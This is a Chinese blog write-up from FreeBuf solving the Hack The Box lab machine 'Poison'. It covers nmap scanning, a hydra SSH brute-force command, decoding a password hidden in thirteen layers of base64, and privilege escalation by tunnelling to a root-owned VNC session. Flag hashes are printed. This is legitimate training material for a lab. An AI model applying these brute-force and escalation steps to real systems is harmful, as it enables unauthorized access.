官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
【HTB 靶机记录】Poison
koazy0- 关注
收藏一下~
可以收录到专辑噢~
【HTB 靶机记录】Poison
Poison
关键词:任意文件读取,base64,端口转发,vnc vncviewer
Enumeration
nmap 扫描端口
nmap -sS 10.10.10.84 -T4 -p-
得到只开放了22端口和80端口
尝试用hydra爆破
sudo hydra -l root -P wordlist.TXT ssh://10.10.10.84
Foothold
user权限
base64 -d base|base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d
#根据提示进行13次解密
base64 -d base|base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d
#得到 Charix!2#4%6&8(0
#直接cat user.txt得到
eaacdfb2d141b72a589233063604209c
ssh 登录,得到用户权限
root权限
发现它把sudo命令ban掉了,sudoer文件也不存在
sudo
cat /etc/sudoers
查看进程,发现有个以root权限进行的进程xvnc 和 xterm
查了一下,好像xterm 没有提权的路径,于是把目光放在xvnc上
vnc参考:https://baike.baidu.com/item/VNC/2906305?fr=aladdin
因此我们用vncviewver
netstat -an发现打开了5801 和 5901的端口,同时发现远程主机没有vncviewver的命令,所以我们使用端口转发。
参考 ssh端口转发:https://blog.csdn.net/misea/article/details/121794393
看见/home/charix 目录下有secret.zip文件,有密码,但是服务器那边好像解压不了,用scp下载下来
(注意保存目录的权限)
scp charix@10.10.10.84:/home/charix/secret.zip /
可能是vncviewer的密码,
进行ssh本地转发
ssh -L 1234:127.0.0.1:5801 charix@10.10.10.84 #最后失败了
ssh -L 1234:127.0.0.1:5901 charix@10.10.10.84
#打开另一个终端
vncviewer 127.0.0.1:1234 -passwd secret
最后得到flag为716d04b188419cf2bb99d891272361f5
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 koazy0 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
koazy0 LV.1
这家伙太懒了,还未填写个人描述!
- 1 文章数
- 0 关注者
文章目录